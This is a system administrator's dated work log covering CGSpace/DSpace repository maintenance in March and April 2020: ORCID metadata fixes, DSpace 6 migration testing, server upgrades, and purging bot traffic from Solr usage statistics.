  • I’m working on the 170 IITA records on DSpace Test from January finally +
      +
    • It’s been two months since I last looked and I want to do a thorough check to make sure Bosede didn’t introduce any new issues, but first I want to consolidate all the text languages for these records so it’s easier to check them in OpenRefine
    • +
    • First I got a list of IDs from csvcut and then I updated the text languages for only those records:
    • +
    +
  • +
+
dspace=# SELECT DISTINCT text_lang, COUNT(*) FROM metadatavalue WHERE resource_type_id=2 AND resource_id in (111295,111294,111293,111292,111291,111290,111288,111286,111285,111284,111283,111282,111281,111280,111279,111278,111277,111276,111275,111274,111273,111272,111271,111270,111269,111268,111267,111266,111265,111264,111263,111262,111261,111260,111259,111258,111257,111256,111255,111254,111253,111252,111251,111250,111249,111248,111247,111246,111245,111244,111243,111242,111241,111240,111238,111237,111236,111235,111234,111233,111232,111231,111230,111229,111228,111227,111226,111225,111224,111223,111222,111221,111220,111219,111218,111217,111216,111215,111214,111213,111212,111211,111209,111208,111207,111206,111205,111204,111203,111202,111201,111200,111199,111198,111197,111196,111195,111194,111193,111192,111191,111190,111189,111188,111187,111186,111185,111184,111183,111182,111181,111180,111179,111178,111177,111176,111175,111174,111173,111172,111171,111170,111169,111168,111299,111298,111297,111296,111167,111166,111165,111164,111163,111162,111161,111160,111159,111158,111157,111156,111155,111154,111153,111152,111151,111150,111149,111148,111147,111146,111145,111144,111143,111142,111141,111140,111139,111138,111137,111136,111135,111134,111133,111132,111131,111129,111128,111127,111126,111125) GROUP BY text_lang ORDER BY count;
+
    +
  • Then I exported the metadata from DSpace Test and imported it into OpenRefine +
      +
    • I corrected one invalid AGROVOC subject using my csv-metadata-quality script
    • +
    +
  • +
  • I exported a new list of affiliations from the database, added line numbers with csvcut, and then validated them in OpenRefine using reconcile-csv:
  • +
+
dspace=# \COPY (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC LIMIT 1500) to /tmp/2020-03-12-affiliations.csv WITH CSV HEADER;
+dspace=# \q
+$ csvcut -l -c 0 /tmp/2020-03-12-affiliations.csv | sed -e 's/^line_number/id/' -e 's/text_value/name/' > /tmp/affiliations.csv
+$ lein run /tmp/affiliations.csv name id
+
    +
  • I always forget how to copy the reconciled values in OpenRefine, but you need to make a new column and populate it using this GREL: if(cell.recon.matched, cell.recon.match.name, value)
  • +
  • I mapped all 170 items to their appropriate collections based on type and uploaded them to CGSpace
  • +
+

2020-03-16

+
    +
  • I’m looking at the CPU usage of CGSpace (linode18) over the past year and I see we rarely even go over two CPUs of sustained usage on average:
  • +
+

linode18 CPU usage year

+
    +
  • Also clearly visible is the effect of CPU steal in 2019-03
  • +
+

linode18 RAM usage year

+

linode18 JVM heap usage year

+
    +
  • At max we have committed 10GB of RAM; the rest is used opportunistically by the filesystem cache, likely for Solr +
      +
    • There was a huge drop in 2019-07 when I changed the JVM settings
    • +
    • I think we should re-evaluate our deployment and perhaps target a different instance type and add block storage for assetstore (as we determined Linode’s block storage to be too slow for Solr)
    • +
    +
  • +
+

2020-03-17

+
    +
  • Update the PostgreSQL JDBC driver to version 42.2.11
  • +
  • Maria from Bioversity asked me to add a new field for the combined subjects of Bioversity and CIAT, since they merged recently +
      +
    • We will use cg.subject.alliancebiovciat
    • +
    +
  • +
+

2020-03-18

+
    +
  • Provision new Linode server (linode26) for DSpace Test to replace the current linode19 server
  • +
  • Improve the DSpace role in our Ansible infrastructure playbooks +
      +
    • We should install npm packages in the DSpace user’s home directory instead of globally as root
    • +
    +
  • +
+

2020-03-19

+
    +
  • Finalized migration of DSpace Test to linode26 and removed linode19
  • +
+

2020-03-22

+
    +
  • Look over the AReS ToRs sent by Enrico and Moayad and add a few notes about missing GitHub issues +
      +
    • Hopefully now they can start working on the development!
    • +
    +
  • +
+

2020-03-24

+
    +
  • Skype meeting about CGSpace with Peter and Abenet
  • +
+

2020-03-25

+
    +
  • I sent Atmire a message to ask if they managed to start working on the DSpace 6 port, as the last communication was twenty-six days ago when they said they were going to secure technical resources to do so
  • +
  • Start adapting the dspace role in our Ansible infrastructure playbooks for DSpace 6 support
  • +
+

2020-03-26

+
    +
  • More work adapting the dspace role in our Ansible infrastructure scripts to DSpace 6
  • +
  • Update Tomcat to version 7.0.103 in the Ansible infrastructure playbooks and deploy on DSpace Test (linode26)
  • +
  • Maria sent me a few new ORCID identifiers from Bioversity so I combined them with our existing ones, filtered the unique ones, and then resolved their names using my resolve-orcids.py script:
  • +
+
$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/bioversity-orcids | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq > /tmp/2020-03-26-combined-orcids.txt
+$ ./resolve-orcids.py -i /tmp/2020-03-26-combined-orcids.txt -o /tmp/2020-03-26-combined-names.txt -d
+# sort names, copy to cg-creator-id.xml, add XML formatting, and then format with tidy (preserving accents)
+$ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-id.xml
+
    +
  • I checked the database for likely matches to the author name and then created a CSV with the author names and ORCID iDs:
  • +
+
dc.contributor.author,cg.creator.id
+"King, Brian","Brian King: 0000-0002-7056-9214"
+"Ortiz-Crespo, Berta","Berta Ortiz-Crespo: 0000-0002-6664-0815"
+"Ekesa, Beatrice","Beatrice Ekesa: 0000-0002-2630-258X"
+"Ekesa, B.","Beatrice Ekesa: 0000-0002-2630-258X"
+"Ekesa, B.N.","Beatrice Ekesa: 0000-0002-2630-258X"
+"Gullotta, G.","Gaia Gullotta: 0000-0002-2240-3869"
+
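  • The database check for likely matches isn’t recorded above; it would have been a query along these lines, using dc.contributor.author (metadata_field_id 3, as elsewhere in these notes) with the surnames only as illustrative examples:

dspace=# SELECT DISTINCT text_value FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=3 AND text_value ~ '^(King, Brian|Ortiz-Crespo|Ekesa|Gullotta)';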
    +
  • Running the add-orcid-identifiers-csv.py script I added 32 ORCID iDs to items on CGSpace!
  • +
+
$ ./add-orcid-identifiers-csv.py -i /tmp/2020-03-26-ciat-orcids.csv -db dspace -u dspace -p 'fuuu'
+
+

2020-03-29

+
    +
  • Add two more Bioversity ORCID iDs to CGSpace and then tag ~70 of the authors’ existing publications in the database using this CSV with my add-orcid-identifiers-csv.py script:
  • +
+
dc.contributor.author,cg.creator.id
+"Snook, L.K.","Laura Snook: 0000-0002-9168-1301"
+"Snook, L.","Laura Snook: 0000-0002-9168-1301"
+"Zheng, S.J.","Sijun Zheng: 0000-0003-1550-3738"
+"Zheng, S.","Sijun Zheng: 0000-0003-1550-3738"
+
    +
  • Deploy latest Bioversity and CIAT updates on CGSpace (linode18) and DSpace Test (linode26)
  • +
  • Deploy latest Ansible infrastructure playbooks on CGSpace and DSpace Test to get the latest dspace-statistics-api (v1.1.1) and Tomcat (7.0.103) versions
  • +
  • Run system updates on CGSpace and DSpace Test and reboot them +
      +
    • After reboot all the Solr statistics cores came back up on the first try on both servers (yay)
    • +
    +
  • +

April, 2020

+ +
+

2020-04-02

+
    +
  • Maria asked me to update Charles Staver’s ORCID iD in the submission template and on CGSpace, as his name was lower case before, and now he has corrected it +
      +
    • I updated the fifty-eight existing items on CGSpace
    • +
    +
  • +
  • Looking into the items Udana had asked about last week that were missing Altmetric donuts: + +
  • +
  • On the same note, the one item Abenet pointed out last week now has a donut with a score of 104 after I tweeted it
  • +
+
    +
  • Altmetric responded about one item that had no donut since at least 2019-12 and said they fixed some problems with their bot’s user agent +
      +
    • I decided to tweet the item, as I can’t remember if I ever did it before
    • +
    +
  • +
+

2020-04-05

+
    +
  • Update PostgreSQL JDBC driver to version 42.2.12
  • +
+

2020-04-07

+
    +
  • Yesterday Atmire sent me their pull request for DSpace 6 modules
  • +
  • Peter pointed out that some items have his ORCID identifier (cg.creator.id) twice +
      +
    • I think this is because my early add-orcid-identifiers.py script was adding identifiers to existing records without properly checking if there was already one present (at first it only checked if there was one with the exact place value)
    • +
    • As a test I dropped all his ORCID identifiers and added them back with the add-orcid-identifiers.py script:
    • +
    +
  • +
+
$ psql -h localhost -U postgres dspace -c "DELETE FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=240 AND text_value LIKE '%Ballantyne%';"
+DELETE 97
+$ ./add-orcid-identifiers-csv.py -i 2020-04-07-peter-orcids.csv -db dspace -u dspace -p 'fuuu' -d
+
    +
  • I used this CSV with the script (all records with his name have the name standardized like this):
  • +
+
dc.contributor.author,cg.creator.id
+"Ballantyne, Peter G.","Peter G. Ballantyne: 0000-0001-9346-2893"
+
    +
  • Then I tried another way, to identify all duplicate ORCID identifiers for a given resource ID and group them so I can see if count is greater than 1:
  • +
+
dspace=# \COPY (SELECT DISTINCT(resource_id, text_value) as distinct_orcid, COUNT(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 240 GROUP BY distinct_orcid ORDER BY count DESC) TO /tmp/2020-04-07-duplicate-orcids.csv WITH CSV HEADER;
+COPY 15209
+
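  • A variant of that query (not the one I ran) could filter directly on the duplicates with HAVING instead of eyeballing the counts:

dspace=# SELECT resource_id, text_value, COUNT(*) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=240 GROUP BY resource_id, text_value HAVING COUNT(*) > 1 ORDER BY count DESC;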
    +
  • Of those, about nine authors had duplicate ORCID identifiers over about thirty records, so I created a CSV with all their name variations and ORCID identifiers:
  • +
+
dc.contributor.author,cg.creator.id
+"Ballantyne, Peter G.","Peter G. Ballantyne: 0000-0001-9346-2893"
+"Ramirez-Villegas, Julian","Julian Ramirez-Villegas: 0000-0002-8044-583X"
+"Villegas-Ramirez, J","Julian Ramirez-Villegas: 0000-0002-8044-583X"
+"Ishitani, Manabu","Manabu Ishitani: 0000-0002-6950-4018"
+"Manabu, Ishitani","Manabu Ishitani: 0000-0002-6950-4018"
+"Ishitani, M.","Manabu Ishitani: 0000-0002-6950-4018"
+"Ishitani, M.","Manabu Ishitani: 0000-0002-6950-4018"
+"Buruchara, Robin A.","Robin Buruchara: 0000-0003-0934-1218"
+"Buruchara, Robin","Robin Buruchara: 0000-0003-0934-1218"
+"Jarvis, Andy","Andy Jarvis: 0000-0001-6543-0798"
+"Jarvis, Andrew","Andy Jarvis: 0000-0001-6543-0798"
+"Jarvis, A.","Andy Jarvis: 0000-0001-6543-0798"
+"Tohme, Joseph M.","Joe Tohme: 0000-0003-2765-7101"
+"Hansen, James","James Hansen: 0000-0002-8599-7895"
+"Hansen, James W.","James Hansen: 0000-0002-8599-7895"
+"Asseng, Senthold","Senthold Asseng: 0000-0002-7583-3811"
+
    +
  • Then I deleted all their existing ORCID identifier records:
  • +
+
dspace=# DELETE FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=240 AND text_value SIMILAR TO '%(0000-0001-6543-0798|0000-0001-9346-2893|0000-0002-6950-4018|0000-0002-7583-3811|0000-0002-8044-583X|0000-0002-8599-7895|0000-0003-0934-1218|0000-0003-2765-7101)%';
+DELETE 994
+
    +
  • And then I added them again using the add-orcid-identifiers-csv.py script:
  • +
+
$ ./add-orcid-identifiers-csv.py -i 2020-04-07-fix-duplicate-orcids.csv -db dspace -u dspace -p 'fuuu' -d
+
    +
  • I ran the fixes on DSpace Test and CGSpace as well
  • +
  • I started testing the pull request sent by Atmire yesterday +
      +
    • I notice that we now need yarn to build, and I need to bump the Node.js engine version in our Mirage 2 theme in order to get it to build on Node.js 10.x
    • +
    • Font Awesome icons for GitHub etc weren’t loading, and after a bit of troubleshooting I replaced version 4.5.0 with 5.13.0 and to my surprise they now include Mendeley and ORCID so we can get rid of the Academicons dependency
    • +
    +
  • +
+

2020-04-12

+
    +
  • Testing the Atmire DSpace 6.3 code with a clean CGSpace DSpace 5.8 database snapshot +
      +
    • One Flyway migration failed so I had to manually remove it (and of course create the pgcrypto extension):
    • +
    +
  • +
+
dspace63=# DELETE FROM schema_version WHERE version IN ('5.8.2015.12.03.3');
+dspace63=# CREATE EXTENSION pgcrypto;
+
    +
  • Then DSpace 6.3 started up OK and I was able to see some statistics in the Content and Usage Analysis (CUA) module, but not on community, collection, or item pages +
      +
    • I also noticed at least one of these errors in the DSpace log:
    • +
    +
  • +
+
2020-04-12 16:34:33,363 ERROR com.atmire.dspace.app.xmlui.aspect.statistics.editorparts.DataTableTransformer @ java.lang.IllegalArgumentException: Invalid UUID string: 1
+
    +
  • And I remembered I actually need to run the DSpace 6.4 Solr UUID migrations:
  • +
+
$ export JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8"
+$ ~/dspace63/bin/dspace solr-upgrade-statistics-6x
+
    +
  • Run system updates on DSpace Test (linode26) and reboot it
  • +
  • More work on the DSpace 6.3 stuff, improving the GDPR consent logic to use haven instead of cookieconsent +
      +
    • It works better by injecting the Google Analytics script after the user clicks agree, and it also has a preferences section that gets automatically injected on the privacy page!
    • +
    +
  • +
+

2020-04-13

+
    +
  • I realized that solr-upgrade-statistics-6x only processes 100,000 records by default so I think we actually need to finish running it for all legacy Solr records before asking Atmire why CUA statlets and detailed statistics aren’t working
  • +
  • For now I am just doing 250,000 records at a time on my local environment:
  • +
+
$ export JAVA_OPTS="-Xmx2000m -Dfile.encoding=UTF-8"
+$ ~/dspace63/bin/dspace solr-upgrade-statistics-6x -n 250000
+
    +
  • Despite running the migration for all of my local 1.5 million Solr records, I still see a few hundred thousand documents with IDs like -1 and 0-unmigrated +
      +
    • I will purge them all and try to import only a subset… (a sketch of that delete is below)
    • +
    • After importing again I see there are indeed tens of thousands of these documents with IDs “-1” and “0”
    • +
    • They are all type: 5, which is “SITE” according to Constants.java:
    • +
    +
  • +
+
/** DSpace site type */
+public static final int SITE = 5;
+
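  • The exact delete isn’t recorded here, but following the same pattern as the other Solr deletes in these notes it would have been something like this (IDs quoted so the leading minus isn’t parsed as a NOT operator):

$ curl -s "http://localhost:8081/solr/statistics/update?softCommit=true" -H "Content-Type: text/xml" --data-binary '<delete><query>type:5 AND (id:"-1" OR id:"0")</query></delete>'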
    +
  • Even after deleting those documents and re-running solr-upgrade-statistics-6x I still get the UUID errors when using CUA and the statlets
  • +
  • I have sent some feedback and questions to Atmire (including about the issue with glyphicons in the header trail)
  • +
  • In other news, my local Artifactory container stopped working for some reason so I re-created it and it seems some things have changed upstream (port 8082 for web UI?):
  • +
+
$ podman rm artifactory
+$ podman pull docker.bintray.io/jfrog/artifactory-oss:latest
+$ podman create --ulimit nofile=32000:32000 --name artifactory -v artifactory_data:/var/opt/jfrog/artifactory -p 8081-8082:8081-8082 docker.bintray.io/jfrog/artifactory-oss
+$ podman start artifactory
+

2020-04-14

+
    +
  • A few days ago Peter asked me to update an author’s name on CGSpace and in the controlled vocabularies:
  • +
+
dspace=# UPDATE metadatavalue SET text_value='Knight-Jones, Theodore J.D.' WHERE resource_type_id=2 AND metadata_field_id=3 AND text_value='Knight-Jones, T.J.D.';
+
    +
  • I updated his existing records on CGSpace, changed the controlled lists, added his ORCID identifier to the controlled list, and tagged his thirty-nine items with the ORCID iD
  • +
  • The new DSpace 6 stuff that Atmire sent modifies Mirage 2’s pom.xml to copy each theme’s resulting node_modules into the theme after building and installing with ant update, because they moved some packages from bower to npm and now reference them in page-structure.xsl +
      +
    • This is a good idea, because bower is no longer supported, and npm has gotten a lot better, but it causes an extra 200,000 files to get copied!
    • +
    • Most scripts are concatenated into theme.js during build, so we don’t need the node_modules after that, but there are three scripts in page-structure.xsl that are not included there
    • +
    • The scripts are a very old version of modernizr which is not even available on npm, html5shiv, and respond.js
    • +
    • For modernizr I can simply download a static copy and put it in 0_CGIAR/scripts and concatenate it into theme.js
    • +
    • For the others, I can revert to using them from bower’s vendor directory, which is installed by the parent XMLUI Mirage 2 theme
    • +
    • During this process I also realized that mvn clean doesn’t actually clean everything: dspace/modules/xmlui-mirage2/target remains from previous builds and contains a bunch of stale artifacts (including all the themes, which I was trying to build without!) +
        +
      • This must be a DSpace bug, but I should theoretically check on vanilla DSpace and then file a bug…
      • +
      +
    • +
    +
  • +
+

2020-04-17

+
    +
  • Atmire responded to some of the issues I raised earlier this week about the DSpace 6 pull request +
      +
    • They said they don’t think the glyphicon encoding issue is due to their changes, but I built a new clean version of the vanilla 6_x-dev branch from before their pull request and it does not have the encoding issue in the Mirage 2 header trails
    • +
    • Also, they said we need to use something called AtomicStatisticsUpdateCLI to do the Solr legacy integer ID to UUID conversion so I asked for more information about that workflow
    • +
    +
  • +
+

2020-04-20

+
    +
  • Looking into a high rate of outgoing bandwidth from yesterday on CGSpace (linode18):
  • +
+
# cat /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "19/Apr/2020:0[6789]" | goaccess --log-format=COMBINED -
+
    +
  • One host in Russia (91.241.19.70) downloaded 23GiB over those few hours in the morning +
      +
    • It looks like all the requests were for one single item’s bitstreams:
    • +
    +
  • +
+
# grep -c 91.241.19.70 /var/log/nginx/access.log.1
+8900
+# grep 91.241.19.70 /var/log/nginx/access.log.1 | grep -c '10568/35187'
+8900
+
    +
  • I thought the host might have been Yandex misbehaving, but its user agent is:
  • +
+
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_3; nl-nl) AppleWebKit/527  (KHTML, like Gecko) Version/3.1.1 Safari/525.20
+
    +
  • I will purge that IP from the Solr statistics using my check-spider-ip-hits.sh script:
  • +
+
$ ./check-spider-ip-hits.sh -d -f /tmp/ip -p
+(DEBUG) Using spider IPs file: /tmp/ip
+(DEBUG) Checking for hits from spider IP: 91.241.19.70
+Purging 8909 hits from 91.241.19.70 in statistics
+
+Total number of bot hits purged: 8909
+
    +
  • While investigating that I noticed ORCID identifiers missing from a few authors’ names, so I added them with my add-orcid-identifiers.py script:
  • +
+
$ ./add-orcid-identifiers-csv.py -i 2020-04-20-add-orcids.csv -db dspace -u dspace -p 'fuuu' -d
+
    +
  • The contents of 2020-04-20-add-orcids.csv was:
  • +
+
dc.contributor.author,cg.creator.id
+"Schut, Marc","Marc Schut: 0000-0002-3361-4581"
+"Schut, M.","Marc Schut: 0000-0002-3361-4581"
+"Kamau, G.","Geoffrey Kamau: 0000-0002-6995-4801"
+"Kamau, G","Geoffrey Kamau: 0000-0002-6995-4801"
+"Triomphe, Bernard","Bernard Triomphe: 0000-0001-6657-3002"
+"Waters-Bayer, Ann","Ann Waters-Bayer: 0000-0003-1887-7903"
+"Klerkx, Laurens","Laurens Klerkx: 0000-0002-1664-886X"
+
    +
  • I confirmed some of the authors’ names from the report itself, then by looking at their profiles on ORCID.org
  • +
  • Add new ILRI subject “COVID19” to the 5_x-prod branch
  • +
  • Add new CCAFS Phase II project tags to the 5_x-prod branch
  • +
  • I will deploy these to CGSpace in the next few days
  • +
+

2020-04-24

+
    +
  • Atmire responded to my ticket about the issue with glyphicons and said their test server does not show this same issue +
      +
    • They asked if I am using the JAVA_OPTS=-Dfile.encoding=UTF-8 when building DSpace and running Tomcat
    • +
    • I set it explicitly for Maven and Ant just now (and cleared all XMLUI caches) but the issue is still there
    • +
    • I asked them if they are building on macOS or Linux, and which Node.js version (I’m using 10.20.1, which is the current LTS branch).
    • +
    +
  • +
+

2020-04-25

+
    +
  • I researched a bit more about the issue with glyphicons and realized it’s due to a bug in libsass +
      +
    • I have Ruby sass version 3.4.25 installed in my local environment, but DSpace Mirage 2 is supposed to build with 3.3.14
    • +
    • Downgrading the version fixes it, though I wonder: why did I not have this issue on the 6.x-dev branch before Atmire’s pull request, and also on 5_x-prod where I’ve been building for a few months here…
    • +
    +
  • +
  • I deployed the latest 5_x-prod branch on CGSpace (linode18), ran all updates, and rebooted the server +
      +
    • This includes the “COVID19” ILRI subject, the new CCAFS Phase II project tags, and the changes to an ILRI author name
    • +
    • After restarting the server I had to restart Tomcat three times before all Solr statistics cores loaded properly.
    • +
    • After that I started a full Discovery reindexing to pick up some author changes I made last week:
    • +
    +
  • +
+
$ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx1024m"
+$ time chrt -i 0 ionice -c2 -n7 nice -n19 dspace index-discovery -b
+
    +
  • I ran the dspace cleanup -v process on CGSpace and got an error:
  • +
+
Error: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
+  Detail: Key (bitstream_id)=(184980) is still referenced from table "bundle".
+
    +
  • The solution is, as always:
  • +
+
$ psql -d dspace -U dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (183996);'
+UPDATE 1
+
    +
  • I spent some time working on the XMLUI themes in DSpace 6 +
      +
    • Atmire’s pull request modifies pom.xml to not exclude node_modules, which means an extra ~260,000 files get copied to our installation folder because of all the themes
    • +
    • I worked on the Gruntfile.js to copy Font Awesome and Bootstrap glyphicon fonts out of node_modules and into fonts at build time, but still jquery-ui.min.css was being referenced as a url() in CSS
    • +
    • SASS can inline imported CSS into the compiled output (instead of emitting an @import url(..)) if you import it without the “.css” extension, but our version of Ruby SASS doesn’t support that
    • +
    • I hacked Gruntfile.js to use dart-sass instead of Ruby compass (including installing compass’s mixins via npm!) but then dart-sass converts all the glyphicon ASCII escape codes to Unicode literals and they show up garbled in Firefox
    • +
    • I tried to use node-sass instead of dart-sass and it doesn’t replace the ASCII escapes with literals, but then I get the issue with the glyphicon in the header trail again! Back to square one!
    • +
    • So that was a waste of five hours…
    • +
    • I might just leave this tiny hack in 0_CGIAR/styles/_style.scss to override this and be done with it:
    • +
    +
  • +
+
.breadcrumb > li + li:before {
+  content: "/\00a0";
+}
+

2020-04-27

+
    +
  • File an issue on DSpace Jira about the mvn clean task not removing the Mirage 2 target directory
  • +
  • My changes to DSpace XMLUI Mirage 2 build process mean that we don’t need Ruby gems at all anymore! We can completely build without them!
  • +
  • Trying to test the com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI script but there is an error:
  • +
+
Exception: org.apache.solr.search.SyntaxError: Cannot parse 'cua_version:${cua.version.number}': Encountered " "}" "} "" at line 1, column 32.
+Was expecting one of:
+    "TO" ...
+    <RANGE_QUOTED> ...
+    <RANGE_GOOP> ...
+
    +
  • Seems something is wrong with the variable interpolation, and I see two configurations in the atmire-cua.cfg file:
  • +
+
atmire-cua.cua.version.number=${cua.version.number}
+atmire-cua.version.number=${cua.version.number}
+
    +
  • I sent a message to Atmire to check
  • +
+

2020-04-28

+
    +
  • I did some work on DSpace 6 to modify our XMLUI theme to use Font Awesome icons via SVG + JavaScript instead of using web fonts +
      +
    • The difference is about 105K less, plus two fewer network requests since we don’t need the web fonts anymore
    • +
    • Before: +
        +
      • scripts/theme.js: 654K
      • +
      • styles/main.css: 220K
      • +
      • fa-brands-400.woff2: 75K
      • +
      • fa-solid-900.woff2: 78K
      • +
      • Total: 1027K
      • +
      +
    • +
    • After: +
        +
      • scripts/theme.js: 704K
      • +
      • styles/main.css: 218K
      • +
      • Total: 922K
      • +
      +
    • +
    +
  • +
  • I manually edited the CUA version variable and was then able to run the com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI script +
      +
    • On the first run it took one hour to process 100,000 records on my local test instance…
    • +
    • On the second run it took one hour to process 140,000 records
    • +
    • On the third run it took one hour to process 150,000 records
    • +
    +
  • +
+

2020-04-29

+
    +
  • I found out that running the Atmire CUA script with more memory and a larger number of records (-r 20000) makes it run faster +
      +
    • Now the process finishes, but there are errors on some records:
    • +
    +
  • +
+
Record uid: ee085cc0-0110-42c5-80b9-0fad4015ed9f couldn't be processed
+com.atmire.statistics.util.update.atomic.ProcessingException: something went wrong while processing record uid: ee085cc0-0110-42c5-80b9-0fad4015ed9f, an error occured in the com.atmire.statistics.util.update.atomic.processor.ContainerOwnerDBProcessor
+        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.applyProcessors(AtomicStatisticsUpdater.java:304)
+        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.processRecords(AtomicStatisticsUpdater.java:176)
+        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.performRun(AtomicStatisticsUpdater.java:161)
+        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.update(AtomicStatisticsUpdater.java:128)
+        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI.main(AtomicStatisticsUpdateCLI.java:78)
+        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+        at java.lang.reflect.Method.invoke(Method.java:498)
+        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
+        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
+Caused by: java.lang.NullPointerException
+        at com.atmire.dspace.cua.CUADSOServiceImpl.findByLegacyID(CUADSOServiceImpl.java:40)
+        at com.atmire.statistics.util.update.atomic.processor.AtomicUpdateProcessor.getDSpaceObject(AtomicUpdateProcessor.java:49)
+        at com.atmire.statistics.util.update.atomic.processor.ContainerOwnerDBProcessor.process(ContainerOwnerDBProcessor.java:45)
+        at com.atmire.statistics.util.update.atomic.processor.ContainerOwnerDBProcessor.visit(ContainerOwnerDBProcessor.java:38)
+        at com.atmire.statistics.util.update.atomic.record.UsageRecord.accept(UsageRecord.java:23)
+        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.applyProcessors(AtomicStatisticsUpdater.java:301)
+        ... 10 more
+
    +
  • I’ve sent a message to Atmire to ask for advice
  • +
  • Also, now I can actually see the CUA statlets and usage statistics +
      +
    • Unfortunately it seems they are using Font Awesome 4 in their CUA module and this means that some icons are broken because the names have changed, but also some of their code is using Unicode characters instead of classes in spans!
    • +
    • I’ve reverted my sweet SVG work from yesterday and adjusted the Font Awesome 5 SCSS to add a few more icons that they are using
    • +
    +
  • +
  • Tezira said she was having issues submitting items on CGSpace today +
      +
    • I looked at all the errors in the DSpace log and see a few SQL pooling errors around mid day:
    • +
    +
  • +
+
$ grep ERROR dspace.log.2020-04-29 | cut -f 3- -d' ' | sort | uniq -c | sort -n
+      1 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL findByUnique Error -
+      1 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL find Error -
+      1 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL query singleTable Error -
+      1 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL QueryTable Error -
+
    +
  • I looked in Munin and I see that there is a strange spike in the database pool usage this afternoon:
  • +
+

Tomcat Database Pool usage day

+
    +
  • Looking at the past month it does seem to be something strange:
  • +
+

Tomcat Database Pool usage month

+
    +
  • Database connections do seem high:
  • +
+
$ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
+      5 dspaceApi
+      6 dspaceCli
+     88 dspaceWeb
+
    +
  • Most of those are idle in transaction:
  • +
+
$ psql -c 'select * from pg_stat_activity' | grep 'dspaceWeb' | grep -c "idle in transaction"
+67
+
    +
  • I don’t see anything in the PostgreSQL or Tomcat logs suggesting anything is wrong… I think the solution to clear these idle connections is probably to just restart Tomcat
  • +
  • I looked at the Solr stats for this month and see lots of suspicious IPs:
  • +
+
$ curl -s 'http://localhost:8081/solr/statistics/select?q=*:*&fq=dateYearMonth:2020-04&rows=0&wt=json&indent=true&facet=true&facet.field=ip'
+
+        "88.99.115.53",23621, # Hetzner, using XMLUI and REST API with no user agent
+        "104.154.216.0",11865,# Google cloud, scraping XMLUI with no user agent
+        "104.198.96.245",4925,# Google cloud, using REST API with no user agent
+        "52.34.238.26",2907,  # EcoSearch on XMLUI, user agent: EcoSearch (+https://search.ecointernet.org/)
+
    +
  • And a bunch more… ugh… +
      +
    • 70.32.90.172: scraping REST API for IWMI/WLE pages with no user agent
    • +
    • 2a01:7e00::f03c:91ff:fe16:fcb: Linode, REST API, no user agent
    • +
    • 2607:f298:5:101d:f816:3eff:fed9:a484: DreamHost, XMLUI and REST API, python-requests/2.18.4
    • +
    • 2a00:1768:2001:7a::20: Netherlands, XMLUI, trying SQL injections
    • +
    +
  • +
  • I need to start blocking requests without a user agent…
  • +
  • I purged the hits from these IPs using my check-spider-ip-hits.sh script:
  • +
+
$ for year in {2010..2019}; do ./check-spider-ip-hits.sh -f /tmp/ips -s statistics-$year -p; done
+$ ./check-spider-ip-hits.sh -f /tmp/ips -s statistics -p
+
    +
  • Then I added a few of them to the bot mapping in the nginx config because it appears they are regular harvesters since 2018
  • +
  • Looking through the Solr stats faceted by the userAgent field I see some interesting ones:
  • +
+
$ curl 'http://localhost:8081/solr/statistics/select?q=*%3A*&rows=0&wt=json&indent=true&facet=true&facet.field=userAgent'
+...
+"Delphi 2009",50725,
+"OgScrper/1.0.0",12421,
+
    +
  • Delphi is only used by IP addresses in Greece, so that’s obviously the GARDIAN people harvesting us…
  • +
  • I have no idea what OgScrper is, but it’s not a user!
  • +
  • Then there are 276,000 hits from MEL-API from Jordanian IPs in 2018, so that’s obviously CodeObia guys…
  • +
  • Other user agents: +
      +
    • GigablastOpenSource/1
    • +
    • Owlin Domain Resolver V1
    • +
    • API scraper
    • +
    • MetaURI
    • +
    +
  • +
  • I don’t know why, but my check-spider-hits.sh script doesn’t seem to be handling the user agents with spaces properly so I will delete those manually after
  • +
  • First delete the ones without spaces, creating a temp file in /tmp/agents containing the patterns:
  • +
+
$ for year in {2010..2019}; do ./check-spider-hits.sh -f /tmp/agents -s statistics-$year -p; done
+$ ./check-spider-hits.sh -f /tmp/agents -s statistics -p
+
    +
  • That’s about 300,000 hits purged…
  • +
  • Then remove the ones with spaces manually, checking the query syntax first, then deleting in yearly cores and the statistics core:
  • +
+
